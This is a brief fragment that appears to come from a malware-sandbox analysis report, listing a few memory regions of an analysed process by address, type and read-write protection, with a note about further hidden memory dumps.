page read and write
37A9000
trusted library allocation
page read and write
1BE69000
heap
page read and write
B00000
trusted library allocation
page read and write
There are 1298 hidden memdumps, click here to show them.